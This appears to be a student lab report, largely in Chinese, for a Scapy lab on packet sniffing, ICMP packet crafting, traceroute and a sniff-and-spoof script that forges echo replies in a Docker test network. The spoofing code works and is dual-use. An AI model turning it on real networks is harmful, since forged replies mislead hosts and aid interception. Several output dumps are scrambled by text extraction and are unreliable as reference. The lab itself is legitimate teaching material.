Lab Task Set 1: Using Scapy to Sniff and Spoof Packets

Task 1.1: Sniffing Packets

Task 1.1A.

实验目标:一方发送报文,另一方进行 sniffer 抓取嗅探。

Code:

```
    from scapy.all import *
    def print_pkt(pkt):
    pkt.show()
    pkt = sniff(iface='br-a662275d44ba', filter='icmp', prn=print_pkt)
```

Result:

User 端发送报文,进行如下操作:

```
root@62335e5ael0b:/# python3
Python 3.8.5 (default, Jul 28 2020, 12:59:40)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> IP()
<IP |>
>>> a=IP(dst="10.9.0.1")
>>> a
<IP dst=10.9.0.1 |>
>>> send(a)
.
Sent 1 packets.
>>> a=IP(dst="10.9.0.5")
>>> send(a)
.
Sent 1 packets.
>>> a=IP(dst="10.9.0.1")
>>> send(a)
.
Sent 1 packets.
>>> a=IP(dst="10.9.0.1")
>>> send(a)
.
Sent 1 packets.
>>> a=IP(dst="10.9.0.1")
>>> send(a)
.
```

Attacker 段进行 sniffer, 结果如下:

```
root@VM:/volumes# python3 sniffer.py
###[ Ethernet ]###
            = 02:42:0a:09:00:05
  dst
             = 02:42:80:bc:2f:ad
  src
  type
             = IPv4
###[ IP ]###
     version
     ihl
                = 5
     tos
                = 0xc0
                = 48
                = 32598
     id
     flags
     frag
                = 0
     ttl
                = 64
                = icmp
     proto
                = 0xe69f
= 10.9.0.1
     chksum
     src
                = 10.9.0.5
     dst
     \options
###[ ICMP ]###
type
                   = dest-unreach
        code
                   = protocol-unreachable
                   = 0xfcfd
        chksum
         reserved = 0
         length
                   = 0
        nexthopmtu= 0
###[ IP in ICMP ]###
            version = 4
```

Task 1.1B.

实验目标: 筛选报文

筛选 ICMP 报文:

```
Code:
```

```
1.
          pkt = sniff(iface='br-a662275d44ba', filter='icmp', prn=print pkt)
root@VM:/volumes# python3 sniffer.py
###[ Ethernet ]###
dst = 02:42:0a:09:00:05
  src
            = 02:42:80:bc:2f:ad
type =
###[ IP ]###
version
             = IPv4
     ihl
                = 0xc0
      tos
                = 48
= 32598
     len
     id
     flags
      frag
                 = 64
                = icmp
= 0xe69f
= 10.9.0.1
     proto
      chksum
     src
     dst
                = 10.9.0.5
      \options
###[ ICMP ]###
        type
code
                    = dest-unreach
                   = protocol-unreachable
= 0xfcfd
         chksum
         reserved = 0
         length
                   = 0
         nexthopmtu= 0
###[ IP in ICMP ]###
            version = 4
```

筛选 TCP, 宿端口为 23 和源 IP 为 10.9.0.5 的报文

Code:

```
1.
          pkt = sniff(iface='br-a662275d44ba', filter='tcp and dst port 23 and src net 10.9.0.5', prn=print_
       pkt)
root@VM:/volumes# python3 sniffer.py
###[ Ethernet ]###
dst = 02:42:80:bc:2f:ad
src = 02:42:0a:09:00:05
             = IPv4
  type
###[ IP ]###
     version
                = 5= 0 \times 0
     ihl
     tos
                = 40
     len
     id
                = 1
     flags
                =
                = 0
     frag
                = 64
     ttl
     proto
                = tcp
     chksum
                = 0x66b8
                = 10.9.0.5
= 10.9.0.1
     src
     dst
      \options
###[ TCP ]###
                    = ftp_data
= telnet
         sport
         dport
                    = 0
         seq
         ack
                    = 0
         dataofs
                    = 5
         reserved = 0
         flags
         window
```

筛选 11.9.1.0/24 的网段报文

Code:

```
1.
        pkt = sniff(iface='br-a662275d44ba', filter='net 11.9.1.0 mask 255.255.255.0', prn=print_pkt)
root@VM:/volumes# python3 sniffer.py
###[ Ethernet ]###
  dst
            = 02:42:80:bc:2f:ad
            = 02:42:0a:09:00:05
  src
            = IPv4
  type
###[ IP ]###
     version
               = 4
               = 5
     ihl
     tos
                = 0 \times 0
                = 20
     len
                = 1
     id
     flags
     frag
                = 0
                = 64
     ttl
     proto
                = hopopt
     chksum
                = 0x64d2
     src
               = 10.9.0.5
     dst
                = 11.9.1.1
     \options
```

Task 1.2: Spoofing ICMP Packets

实验目的:构造 ICMP 报文

```
实验过程即结果如下:
```

```
>>> from scapy.all import *
>>> a= IP()
>>> a.dst ='10.9.0.1'
>>> b=ICMP()
>>> p=a/b
>>> send(p)
Sent 1 packets.
>>> ls(a) version
                 : BitField (4 bits)
: BitField (4 bits)
: XByteField
                                                                                                          (None)
ihl
                                                                              = None
tos
                                                                                                           (0)
                                                                             = None
len
                    ShortField
ShortField
                                                                                                           (None)
                                                                                                          (1)
(<Flag 0 ()>)
id
                    FlagsField (3 bits)
BitField (13 bits)
ByteField
ByteEnumField
                                                                              = <Flag 0 ()>
flags
                                                                             = 0 = 64
                                                                                                          (0)
(64)
frag
ttl
proto
chksum
                                                                              = 0
                                                                                                          (0)
                 : XShortField
: SourceIPField
                                                                             = None
= '10.9.0.5'
= '10.9.0.1'
                                                                                                          (None)
src
                                                                                                          (None)
dst
                 : DestIPField: PacketListField
                                                                                                          (None)
                                                                             = []
options
```

Task 1.3: Traceroute

实验目的:路由追踪

Code:

```
1.
       from scapy.all import *
2.
      hostname = "10.9.0.5"
3.
       for i in range(1, 28):
4.
           pkt = IP(dst=hostname, ttl=i) / UDP(dport=33434)
5.
           # Send the packet and get a reply
6.
           reply = sr1(pkt,verbose=0)
7.
           if reply is None:
8.
               # No reply =(
9.
               break
```

```
10. elif reply.type == 3:

11.  # We've reached our destination

12. print ("Done!", reply.src)

13. break

14. else:

15. # We're in the middle somewhere

16. print ("%d hops away: " % i , reply.src)
```

实验结果:如下

root@VM:/volumes# python3 traceroute.py Done! 10.9.0.5

Task 1.4: Sniffing and-then Spoofing

实验目的:进行ICMP报文捕获以及欺骗

Code:

```
1.
      from scapy.all import *
2.
      def sniffandspoof(pkt):
3.
          if ICMP in pkt and pkt[ICMP].type==8:
4.
             print("Original Packet....")
5.
             print("Source IP:",pkt[IP].src)
6.
             print("Destination IP:",pkt[IP].dst)
7.
8.
             ip=IP(src=pkt[IP].dst,dst=pkt[IP].src,ihl=pkt[IP].ihl)
9.
             icmp=ICMP(type=0,id=pkt[ICMP].id,seq=pkt[ICMP].seq)
10.
             data=pkt[Raw].load
11.
             newpkt=ip/icmp/data
12.
             print("Spoofed Packet....")
13.
             print("Source IP:",newpkt[IP].src)
14.
             print("Destination IP:",newpkt[IP].dst)
15.
             send(newpkt,verbose=0)
16.
17.
18. pkt = sniff(iface='br-a662275d44ba', filter='icmp and src host 10.9.0.5', prn=sniffandspoof)
```

实验结果如下:

初次在 User 端 ping 不存在的外网 IP 地址 1.2.3.4,显示无法 ping 通: 在 Attacker 端运行上述代码后,构造欺骗 ICMP 报文后,在 User 端 ping1.1.1.1 结果如下:

```
root@49afe2b85a23:/# ping 1.2.3.4
PING 1.2.3.4 (1.2.3.4) 56(84) bytes of data.
From 10.9.0.1 icmp_seq=1 Destination Net Unreachable
64 bytes from 1.2.3.4: icmp_seq=1 ttl=64 time=51.1 ms From 10.9.0.1 icmp_seq=2 Destination Net Unreachable 64 bytes from 1.2.3.4: icmp_seq=2 ttl=64 time=24.0 ms
From 10.9.0.1 icmp_seq=3 Destination Net Unreachable
64 bytes from 1.2.3.4: icmp_seq=3 ttl=64 time=23.9 ms
From 10.9.0.1 icmp_seq=4 Destination Net Unreachable 64 bytes from 1.2.3.4: icmp_seq=4 ttl=64 time=18.8 ms 64 bytes from 1.2.3.4: icmp_seq=5 ttl=64 time=21.6 ms 64 bytes from 1.2.3.4: icmp_seq=6 ttl=64 time=19.4 ms
64 bytes from 1.2.3.4: icmp_seq=7 ttl=64 time=25.0 ms
64 bytes from 1.2.3.4: icmp_seq=8 ttl=64 time=23.4 ms
64 bytes from 1.2.3.4: icmp_seq=9 ttl=64 time=25.3 ms ^C
 --- 1.2.3.4 ping statistics --
9 packets transmitted, 9 received, +4 errors, 0% packet loss, time 8044ms rtt min/avg/max/mdev = 18.837/25.843/51.149/9.207 ms
```

如下是 sniff and spoof 程序实时输出结果:

```
root@VM:/volumes# python3 ss.py
Original Packet.....
Source IP: 10.9.0.5
Destination IP: 1.2.3.4
Spoofed Packet.....
Source IP: 1.2.3.4
Destination IP: 10.9.0.5
Original Packet.....
Source IP: 10.9.0.5
Destination IP: 1.2.3.4
Spoofed Packet.....
Source IP: 1.2.3.4
Destination IP: 10.9.0.5
```

对于内网不存在的 ip 地址 10.9.0.99, 开启欺骗, 仍然不能 ping 通:

```
対すり関小付任的 IP 地址 10.9.0.99, 开戸rot@49afe2b85a23:/# ping 10.9.0.99
PING 10.9.0.99 (10.9.0.99) 56(84) bytes of data.
From 10.9.0.5 icmp_seq=1 Destination Host Unreachable From 10.9.0.5 icmp_seq=2 Destination Host Unreachable From 10.9.0.5 icmp_seq=3 Destination Host Unreachable From 10.9.0.5 icmp_seq=4 Destination Host Unreachable From 10.9.0.5 icmp_seq=5 Destination Host Unreachable From 10.9.0.5 icmp_seq=6 Destination Host Unreachable From 10.9.0.5 icmp_seq=7 Destination Host Unreachable From 10.9.0.5 icmp_seq=8 Destination Host Unreachable From 10.9.0.5 icmp_seq=8 Destination Host Unreachable From 10.9.0.5 icmp_seq=9 Destination Host Unreachable From 10.9.0.5 icmp_seq=9 Destination Host Unreachable
   From 10.9.0.5 icmp_seq=9 Destination Host Unreachable
From 10.9.0.5 icmp_seq=10 Destination Host Unreachable
From 10.9.0.5 icmp_seq=11 Destination Host Unreachable
From 10.9.0.5 icmp_seq=12 Destination Host Unreachable
```

--- 10.9.0.99 ping statistics --- 13 packets transmitted, 0 received, +12 errors, 100% packet loss, time 12292ms

因为 User 网关为 Attacker 端,内网通信不经过网关,Attacker 也无法捕获 ICMP 请求报文

```
root@49afe2b85a23:/# route -n
Kernel IP routing table
Destination
                Gateway
                                                 Flags Metric Ref
                                                                      Use Iface
                                 Genmask
                10.9.0.1
0.0.0.0
                                 0.0.0.0
                                                 UG
                                                               0
                                                                        0 eth0
10.9.0.0
                                 255.255.255.0
                                                 U
                                                        0
                                                               0
                                                                        0 eth0
              0.0.0.0
```

```
对于存在的外网地址 8.8.8.8(没有连接外部互联网时)
root@49afe2b85a23:/# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
From 10.9.0.1 icmp_seq=1 Destination Net Unreachable
From 10.9.0.1 icmp_seq=2 Destination Net Unreachable
From 10.9.0.1 icmp_seq=3 Destination Net Unreachable
From 10.9.0.1 icmp_seq=4 Destination Net Unreachable
^C
--- 8.8.8.8 ping statistics ---
5 packets transmitted, 0 received, +4 errors, 100% packet loss, time 4076ms

### PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
From 10.9.0.1 icmp_seq=1 Destination Net Unreachable
64 bytes from 8.8.8.8 icmp_seq=1 ttl=64 time=60.6 ms
From 10.9.0.1 icmp_seq=2 Destination Net Unreachable
64 bytes from 8.8.8.8 icmp_seq=2 ttl=64 time=60.6 ms
From 10.9.0.1 icmp_seq=3 Destination Net Unreachable
64 bytes from 8.8.8.8 icmp_seq=2 ttl=64 time=24.2 ms
From 10.9.0.1 icmp_seq=3 Destination Net Unreachable
```

如下是 sniff and spoof 程序实时输出结果:

64 bytes from 8.8.8.8: icmp_seq=3 ttl=64 time=18.8 ms

From 10.9.0.1 icmp_seq=4 Destination Net Unreachable 64 bytes from 8.8.8.8: icmp_seq=4 ttl=64 time=18.0 ms 64 bytes from 8.8.8.8: icmp_seq=5 ttl=64 time=23.7 ms 64 bytes from 8.8.8.8: icmp_seq=6 ttl=64 time=18.9 ms 64 bytes from 8.8.8.8: icmp_seq=7 ttl=64 time=24.2 ms

64 bytes from 8.8.8.8: icmp_seq=8 ttl=64 time=17.5 ms 64 bytes from 8.8.8.8: icmp_seq=9 ttl=64 time=24.2 ms 64 bytes from 8.8.8.8: icmp_seq=10 ttl=64 time=28.5 ms 64 bytes from 8.8.8.8: icmp_seq=11 ttl=64 time=20.5 ms 64 bytes from 8.8.8.8: icmp_seq=12 ttl=64 time=23.3 ms 64 bytes from 8.8.8.8: icmp_seq=13 ttl=64 time=25.1 ms 64 bytes from 8.8.8.8: icmp_seq=14 ttl=64 time=19.9 ms

```
root@VM:/volumes# python3 ss.py
Original Packet....
Source IP: 10.9.0.5
Destination IP: 8.8.8.8
Spoofed Packet.....
Source IP: 8.8.8.8
Destination IP: 10.9.0.5
Original Packet.....
Source IP: 10.9.0.5
Destination IP: 8.8.8.8
Spoofed Packet.....
Source IP: 8.8.8.8
Destination IP: 10.9.0.5
Original Packet.....
Source IP: 10.9.0.5
Destination IP: 8.8.8.8
Spoofed Packet.....
Source IP: 8.8.8.8
Destination IP: 10.9.0.5
```